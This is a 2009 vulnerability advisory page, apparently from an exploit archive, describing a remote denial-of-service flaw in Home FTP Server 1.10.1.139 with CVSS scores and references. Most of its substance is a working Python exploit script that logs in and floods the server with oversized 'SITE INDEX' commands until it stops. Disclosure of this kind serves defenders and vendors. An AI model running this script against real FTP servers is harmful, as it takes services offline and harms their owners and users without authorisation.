Home FTP Server Remote Denial of Service Vulnerability

2009-11-23 / 2009-11-24
Credit: zhangmc
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Date of Discovery: 16-Nov-2009 Credits:zhangmc[at]mail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server FTP Server is an easy use FTP server Application. Denial of service vulnerability exists in Home FTP Server that causes the application to stop service when we send multiple irregular "SITE INDEX" commands to the server. Details: If you could log on the server successfully, take the following steps and the application will stop service: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.for i in range(1,20): sock.send("SITE INDEX "+ "a"*30*i +"\r\n") 5.sock.close() Severity: High Exploit example: #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] test_string="a"*30 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) for i in range(1,30): try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] "+ r sock.send("user %s\r\n" %username) print "[-] "+ ("user %s\r\n" %username) r=sock.recv(1024) print "[+] "+ r sock.send("pass %s\r\n" %passwd) print "[-] "+ ("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] "+ r for i in range(1,20): sock.send("SITE INDEX "+ test_string*i +"\r\n") print "[-] "+ ("SITE INDEX "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.close() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.exit(0);

References:

http://www.vupen.com/english/advisories/2009/3269
http://www.securityfocus.com/bid/37033
http://www.securityfocus.com/archive/1/archive/1/507893/100/0/threaded
http://secunia.com/advisories/37381


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top